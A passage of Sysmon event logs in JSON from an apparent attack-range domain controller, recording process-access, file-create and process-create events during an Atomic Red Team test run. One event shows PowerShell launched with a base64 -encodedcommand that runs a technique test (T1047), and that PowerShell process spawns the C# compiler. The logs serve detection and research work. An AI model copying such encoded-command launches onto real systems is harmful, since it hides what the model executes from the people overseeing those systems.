07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4972,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4973,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4974,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4975,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010BFA10700}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-001007E90700}\r\nTargetProcessId: 1156\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010BFA10700}","SourceProcessId":"4376","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-001007E90700}","TargetProcessId":"1156","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4976,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:10.861\r\nProcessGuid: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nProcessId: 2456\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\iuv2ydtc\\iuv2ydtc.dll\r\nCreationUtcTime: 2020-08-01 07:59:10.861","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:10.861","ProcessGuid":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\iuv2ydtc\\iuv2ydtc.dll","CreationUtcTime":"2020-08-01 07:59:10.861","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4977,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.861\r\nProcessGuid: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nProcessId: 2456\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\iuv2ydtc\\iuv2ydtc.cmdline\r\nCreationUtcTime: 2020-08-01 07:59:10.861","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.861","ProcessGuid":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\iuv2ydtc\\iuv2ydtc.cmdline","CreationUtcTime":"2020-08-01 07:59:10.861","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4978,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.868\r\nProcessGuid: {41C8662E-20CE-5F25-0000-0010D4EC0700}\r\nProcessId: 3064\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\iuv2ydtc\\iuv2ydtc.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CD-5F25-0000-002017A10700}\r\nLogonId: 0x7A117\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nParentProcessId: 2456\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.868","ProcessGuid":"{41C8662E-20CE-5F25-0000-0010D4EC0700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\iuv2ydtc\\iuv2ydtc.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CD-5F25-0000-002017A10700}","LogonId":"0x7a117","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","ParentProcessId":"2456","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4979,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.861\r\nSourceProcessGUID: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nSourceProcessId: 2456\r\nSourceThreadId: 5028\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-0010D4EC0700}\r\nTargetProcessId: 3064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffed80(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffed80(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5c25dc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e3b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e086|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af04f49b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae55ec1c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5bd0eb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a05e1","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.861","SourceProcessGUID":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","SourceProcessId":"2456","SourceThreadId":"5028","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-0010D4EC0700}","TargetProcessId":"3064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C